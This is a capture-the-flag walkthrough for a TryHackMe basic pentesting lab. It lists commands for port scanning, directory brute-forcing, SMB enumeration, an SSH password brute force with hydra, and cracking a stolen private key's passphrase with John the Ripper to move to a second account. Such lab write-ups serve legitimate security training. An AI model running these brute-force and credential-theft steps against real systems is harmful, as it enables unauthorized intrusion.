Basic Pentesting — TryHackMe
Task 1 : Web App Testing and Privilege Escalation
>Find the services exposed by the machine, Let’s run nmap and see if it discovers anything useful!
sudo nmap -T4 -A -p- <MACHINE_IP>
>What is the name of the hidden directory on the web server?
To find hidden directories we can use tools like dirsearch,dirbuster or gobuster, i will use gobuster.
sudo gobuster dir -w <wordlist_path>-u http://<MACHINE_IP>/
we discovered the hidden directory and lets browse to it and see what’s there!
By opening the above two text files in the directory, we can know that user J has weak password , SMB has been configured and Apache struts 2.5.12 is running.
>User brute-forcing to find the username & password
Let’s enumerate SMB with enum4linux,
enum4linux -a <MACHINE_IP>
Here we got two users , lets try to get the password of user jan.
We will use HYDRA to crack password of user jan.
sudo hydra -l jan -P /home/kali/rockyou.txt ssh://<MACHINE_IP>
Then login to machine ip using ssh service by entering the cracked password of user jan.
sudo ssh jan@<MACHINE_IP>
Let’s look around the machine to find a way to access kay’s account.
We do not have the right privileges to access the password file.Let’s try to escalate the kay’s privilege. Here we found the ssh keys of user kay. Copy it to your local machine.Then generate hash of the keys copied using ssh2john.
sudo python /usr/share/john/ssh2john.py id_rsa > new_id_rsa1
Lets run John the ripper to crack the passphrase for kay.
sudo john — wordlist=rockyou.txt new_id_rsa1
Let’s access kay’s ssh using public keys of his account.
ssh -i id_rsa kay@<MACHINE_IP>
>What is the final password you obtain?
Now we can access the pass.bak file to obtain the final password.
All the challenges are completed , we successfully pwned the machine!!☠
Thank You!!
Happy Hacking!!
